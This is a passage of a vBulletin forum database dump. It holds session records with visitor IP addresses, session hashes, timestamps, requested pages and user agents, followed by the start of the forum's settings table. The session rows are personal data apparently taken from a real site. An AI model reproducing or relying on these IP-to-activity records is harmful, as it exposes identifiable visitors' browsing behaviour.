('7d3a7b753994996e9fdf45e0dde708a4', 0, '172.68.11.247', 'a490a783c23b780b8ed94d35f7bdffae', 1474888335, '/showthread.php?t=2388&page=2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6bc5555692cd82e01b2e091564257cd6', 0, '136.243.227.137', '8f0614b31ebaace078525d2234e3897d', 1474890310, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('10f3fd2b72b2607ef756044a3de93e9f', 0, '118.69.72.175', 'cd19ed077d74cd0f65ec40f45389a10f', 1474891518, '/index.php', 'python-requests/2.11.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6c8d72de71a2a396f26223bdc323b1b9', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474893861, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('07f981cecb0fe8c8fc0e81080b3fad82', 0, '172.68.11.252', 'c5b49a213721814cb3d048ece0be3d5f', 1474897062, '/showthread.php?mode=hybrid&t=2469', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('24a773da7722d377ba9d429882af52a6', 0, '172.68.10.236', '7e9a003d4fd96c8f022e55bc49fa983a', 1474904855, '/login.php?do=login&do=login', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.34 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea4e6ad574652065711cf78be3574f52', 0, '179.43.146.230', '40feeb248cec1a23d348b50085eafe63', 1474911681, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a825afff6a618f67d9d8188ace810929', 0, '82.163.79.61', 'c93617aa0fa536e4a37d893bc1a5914b', 1474912428, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5d43260578c8487345654ca6f17bb71c', 0, '172.68.54.83', '8f6139793f2b6c25ef237f2c71ecf910', 1474915754, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ba0e5da8ec09f6ac150849a450da0a33', 0, '172.68.11.247', '2f757dc417ed589271c8f0a966a75510', 1474918424, '/index.php?', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e9e49f12169ef1c10090ee925020be3', 0, '75.83.33.10', '90ca03d7ac6fe2c72bd3f67ac4fa8f26', 1475191393, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71f85a6025f3b79f04f6cb8a83c66290', 0, '107.172.177.241', '4c59dfdc68f0f768bfe78d9aa3848748', 1474929172, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ebdc510e6ad1d404b9b5ec5494840653', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474937053, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('9fa5e7d1bb622d479c820ce25b7895f8', 0, '157.55.39.246', '23f3103f44bc3badcba53554e5e4cb6d', 1474951939, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a029fe1e979df692ec131dbe1a705a8c', 0, '110.148.115.55', '99281ec0c162ad40054d2d82e014afc7', 1474978595, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('294309b81e8b6755b7001c242dbb26a8', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474979881, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7b83d1a8075e484496370166f0fc36eb', 0, '37.58.59.88', 'f314535e69c37d4229a27f67af2ad9d4', 1474989729, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3976f491c46a8e7000611082c76eb4c4', 0, '23.94.178.21', '567986109e1278fd368dd0904cd68119', 1475016600, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('31a399f22ba6551f86d34fa290069857', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475022851, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c558efe95ed807b755aa6a593bab1cdf', 0, '107.172.195.68', '02e4728d7a73eb7bb9a41a55d9bc4de6', 1475033739, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f5e61994069cfea8b0fbb04ca6b4ea24', 0, '49.158.142.121', '35529101dd66d5551c33db03a24b9fd2', 1475054963, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e31d5eab7ac35962dd03cfbf5ad055bc', 0, '217.23.2.152', 'a8fc53024e6235b1a4bc69226164cde7', 1475093510, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2300.0 Iron/4', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('97782390c697c4df5a39665aa847e571', 0, '212.243.26.254', '9c7dc3395c4499f6176e19013a3f8ea1', 1475064082, '/faq.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('353c12527c9e53988818538b3ad48ec5', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475065604, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('943076958cbef3d36b6088d06f9e1411', 0, '31.24.221.3', '331e19f0e62f2d572c5fc6b5ef22a9e9', 1475067289, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9bcb20ddfb4c36fb8fd0364467f5b8b4', 0, '105.112.45.12', 'f7659d16b453144102bdb41d89fe9f59', 1475071447, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('95638efc261adcf2240339e49277a52d', 0, '89.163.237.45', '267e41e3b739f07cbffce7c0edaf7c5c', 1475072496, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8a28e963f32d40b60e7d4a98b5c5e737', 0, '86.172.106.161', '074454fe0cd7d100af64af36f4064f3b', 1475075937, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a131263f043f3c299370b5f7e529fd1', 0, '185.129.62.63', 'bf3903e12de17605cc3e148ce97597da', 1475087453, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd54f5a11214697691652a965ce8018f', 0, '173.254.250.93', '517c526f3c21bf4264a572b1b53dfea2', 1475102010, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('498327b29e43221355fe0c82179133b7', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475108452, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6bd4a1516fa04cfeea17720fdb0307c4', 0, '141.8.143.170', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475118745, '/search.php?do=finduser&userid=11&searchthreadid=1825', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ef9977c8bcab52b3ddd9dc9b21f69fab', 0, '66.249.64.108', '881de0811167d68e6f4733be9b8109c2', 1475121556, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4e928f4e2cc639dcc4390b8c12600686', 0, '66.249.64.116', 'b74d0bcf4e50a120a01910c89bfe2d08', 1475130484, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8e449e3cd4971565de40d83eb7804a7c', 0, '172.68.11.202', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475135507, '/showthread.php?p=2889', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9b8a024ff3ea9ff4ebf037e16b03ece5', 0, '207.46.13.116', '5e207e311e22cdc3b2095126a922fa93', 1475138870, '/showthread.php?p=2800&mode=threaded', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0f5b39ce23c0b20f1359ee13a5cf9d03', 0, '207.46.13.11', '5e207e311e22cdc3b2095126a922fa93', 1475161350, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('896d53ec1df2ae9802983620231d704f', 0, '157.55.39.127', '23f3103f44bc3badcba53554e5e4cb6d', 1475138947, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bb22a04ef6d226d12819e0c07d0d54fc', 0, '40.77.167.81', 'c5490a5a8e1813ac25cf9e19091dcb85', 1475145140, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a87c30d30ae7aefb871147ae6f974037', 0, '31.24.221.3', '06923015989ce6e66b35eb138ab9cf5f', 1475146212, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('613ff9e2a3d848bf94269cb4ffea6756', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475151193, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2fdb443848699d13b018550b6f097088', 0, '40.77.167.13', 'c5490a5a8e1813ac25cf9e19091dcb85', 1475163185, '/showpost.php?p=1034&postcount=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0af1361c49eb34d8bcafbad68a88a6f8', 0, '207.46.13.75', '5e207e311e22cdc3b2095126a922fa93', 1475163927, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ffa162405d02a92d05dc4874a39f2be9', 0, '136.169.143.79', '78124d3cedfc71439baf3d82e30f6767', 1475171292, '/showthread.php?p=2697', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2df867986486f0f0f78aa2ea7c417c0e', 0, '185.129.62.62', 'bf3903e12de17605cc3e148ce97597da', 1475172066, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('89104e716b1ef5a35c5fea8429d59a8c', 0, '46.105.100.149', '50cf8c20b7b127b642b17ab2a96e3d3d', 1475172085, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('52b6fe88e0c3175172418b51e1f21bc7', 0, '62.235.22.8', 'c384662fb93a7d39ead96ab290d76b70', 1475172109, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ec70d92eed2994c79c72aef1d22cd88', 0, '66.249.69.108', 'dce73380cf0fd3aff82da93d9252bb04', 1475172963, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6bb9515f8a087ad50aaf5fc8396039ee', 0, '61.77.39.81', '48faf92c4a61295c16c328326116cda9', 1475174901, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f0eca966bc3b4fc1f1ecb85f83e63762', 0, '172.68.58.121', 'a938925ca9403f145c82d10ebc1ecbe1', 1475183082, '/search.php?searchthreadid=tlgcjlbz', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('354711db63a8adfffe4cd3e6d87a6bc3', 0, '23.106.26.198', 'a823512157afe4b054e3e8e0db2c0cae', 1475189409, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('02434c44f67b5563bf93770c9d763fc0', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475194250, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('357604e7742f46d29a5ca39554d549dc', 0, '149.7.104.54', '54599670f8a82efa1db4e2694463812f', 1475200297, '/search.php?do=process&do=process', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3d9f1f50c9fa4bf65d64e278201925f3', 0, '172.68.10.237', 'd382139bb3d82c151af36c60209d061e', 1475202075, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4a7fd6b18ebfdc9e95726479f8cd598a', 0, '178.17.170.160', '000c39d738060b515fcf9fb53fa029a2', 1475205770, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bb3ac499900e4cb4983e588d34e0239e', 0, '172.68.10.199', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475208906, '/member.php?u=286', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2c4efb7df17f2ca6cdca86f2c8a0d6de', 0, '197.231.221.211', '40ddf4a5f9bf26f2aac9a7a030e56918', 1475209992, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e4537129262849f83f3ecee85549cf33', 0, '41.152.212.166', '7eb90a8bdb63c0e4d6cce61282729b39', 1475221487, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f0220bbcc1e5cc373c798cda93688298', 0, '85.118.134.144', '1c140b856e45ad14bc6f60da38fd472e', 1475229191, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bbf22d13a7204295a282d07b7fbcd3c7', 0, '82.26.149.19', '0edba7e5942290cc61eb34492024f8e6', 1475232697, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bfcd411d8e24f56ac14e373f2e307b92', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475237222, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5f65f56908ad9c786ea30096b6cd6f79', 0, '172.68.10.237', '97acb2931120ab73ef9ece966d5e10e1', 1475239107, '/login.php?do=logout&logouthash=1475239104-15d7970c2f3ebac0e0e0f508fc42ed31647bd3e7', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f2f3d421112077e1678d31124b8ee464', 0, '172.68.11.239', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475245724, '/member.php?u=100', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('68c275281994388160c29c93a393c3dd', 0, '157.55.39.66', '23f3103f44bc3badcba53554e5e4cb6d', 1475355335, '/showpost.php?p=1034&postcount=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3e96376af1c1ad683f67a807ff60aca6', 0, '182.64.103.71', '71694a9d689c3e01851c16c88e030bfb', 1475254915, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:37.0) Gecko/20100101 Firefox/37.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e2f405d32b8eb2ba7965b92100f327ed', 0, '110.148.126.100', '469aebeb3fed665f436921e9884aa5d6', 1475256833, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4143b7d713c85ae5d8537373af67ce1c', 0, '172.68.11.200', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475260105, '/showthread.php?p=2818', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a38f5f1603433dbe1f7f689cd5d42814', 0, '107.172.188.218', 'f5b9eb8db4d3f19fc70b5b72bc8a14a8', 1475274865, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7d4e2a47617a002221278bdfa376f7b5', 0, '105.112.23.203', '670fed1bf4f4fe33d2bdf896f8405a2c', 1475279999, '/login.php?do=emailpassword&do=emailpassword', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1b2e3bd5993e00688c7f7d5731269179', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475280485, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c8d154a022c2d1f1df1bdd78b38a138e', 0, '163.172.66.43', '8045a81583e9ce15f95c56fc1e953b46', 1475288243, '/search.php', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e808360440e5865db4edde824275383', 0, '38.145.13.161', '7ac5947f441215757a74a2a48987c0f0', 1475292875, '/showthread.php?t=2483', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5266ce2ee290479670958c24a7afc32e', 0, '172.68.51.103', 'bc94047c37b66959ec1f8fb08d9f9fbd', 1475304264, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5e821f46d3dd2b8c8c41aec5246ec953', 0, '125.227.89.99', '5277ea2228c90e3367408424d4c90fb5', 1475309804, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.32 (KHTML, like Gecko) Mo', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d3d4eeee3d81035cbafd3dda1b69cfaf', 0, '62.210.14.143', '838c2549a86f4838d0100efaca569aff', 1475352675, '/member.php?u=388', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('85ac6376ed98a7f979580aaed66157b1', 0, '178.216.49.220', 'e61492ad52fd5ec48dfcf303a8da163d', 1475315114, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('590fd4f5ef1ee80403ce25cc4db33119', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1475323739, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('770334b5dc74022fda5822ae6a62a1bf', 0, '172.68.10.205', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475337753, '/member.php?u=173', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5d2869f4f6b4c788bde3c4051c5171d7', 0, '100.43.90.8', '31f0b0381586e7e9ee00c6a6519d3cb4', 1475338633, '/showthread.php?p=2807', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e5a5c9cf8218286d329d35bad6fc9d0', 0, '1.55.180.30', 'a98fecf20b107a9696ce7418293d468d', 1475339334, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('595ae327aa75b76db724bb70932f0f05', 0, '172.68.11.197', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475342915, '/tweet.php?do=post&id=2850&c=2850', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e58e4815d75d9564ffc60303e67dbd18', 0, '216.155.131.74', 'a65b55d734b208a76868aae4e4233abf', 1475355416, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3d39fac414a18bd70c0ebdc83bad5001', 0, '109.201.133.100', 'ad240255acf0fdd9981d293d44920d92', 1475354510, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cf469529899ebbf2f09e3dd22dd2f3da', 0, '207.46.13.115', '5e207e311e22cdc3b2095126a922fa93', 1475355326, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0);
DROP TABLE IF EXISTS `setting`;
CREATE TABLE `setting` (
`varname` varchar(100) NOT NULL DEFAULT '',
`grouptitle` varchar(50) NOT NULL DEFAULT '',
`value` mediumtext,
`defaultvalue` mediumtext,
`optioncode` mediumtext,
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '0',
`advanced` smallint(6) NOT NULL DEFAULT '0',
`volatile` smallint(5) unsigned NOT NULL DEFAULT '0',
`datatype` enum('free','number','boolean','bitfield','username','integer','posint') NOT NULL DEFAULT 'free',
`product` varchar(25) NOT NULL DEFAULT '',
`validationcode` text,
`blacklist` smallint(6) NOT NULL DEFAULT '0',
PRIMARY KEY (`varname`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `setting` (`varname`, `grouptitle`, `value`, `defaultvalue`, `optioncode`, `displayorder`, `advanced`, `volatile`, `datatype`, `product`, `validationcode`, `blacklist`) VALUES
('activememberdays', 'forumhome', '30', '30', '', 70, 0, 1, 'number', 'vbulletin', '', 0),
('activememberoptions', 'forumhome', '3', '3', 'bitfield:nocache|activememberoptions', 80, 0, 1, 'bitfield', 'vbulletin', '', 0),
('addheaders', 'http', '0', '', 'yesno', 200, 0, 1, 'boolean', 'vbulletin', '', 0),
('addpolltimeout', 'posting', '0', '0', '', 215, 0, 1, 'number', 'vbulletin', '', 0),
('address', 'address', '', '', '', 110, 0, 1, 'free', 'vbulletin', '', 0),
('addtemplatename', 'general', '0', '', 'yesno', 300, 0, 1, 'boolean', 'vbulletin', '', 0),
('adminpower', 'reputation', '10', '10', '', 40, 0, 1, 'number', 'vbulletin', '', 0),
('adminquickstats', 'admincp', '0', '', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('aggressiveemailban', 'banning', '0', '0', 'yesno', 31, 0, 1, 'boolean', 'vbulletin', '', 0),
('albums_perpage', 'useralbum', '10', '10', '', 10, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('albums_pictures_moderation', 'useralbum', '0', '0', 'yesno', 25, 0, 1, 'boolean', 'vbulletin', '', 0),
('album_captionpreviewlen', 'useralbum', '150', '150', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('album_dataloc', 'version', 'db', 'db', 'radio:piped\r\ndb|DB\r\nfs|File System\r\nfs_directthumb|File System with Direct Thumbs', 120, 0, 1, 'free', 'vbulletin', '', 0),
('album_maxpicsperalbum', 'useralbum', '60', '60', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('album_picpath', 'version', '', '', '', 130, 0, 1, 'free', 'vbulletin', '', 0),
('album_pictures_perpage', 'useralbum', '25', '25', '', 20, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('album_recentalbumdays', 'useralbum', '7', '7', '', 63, 0, 1, 'number', 'vbulletin', '', 0),
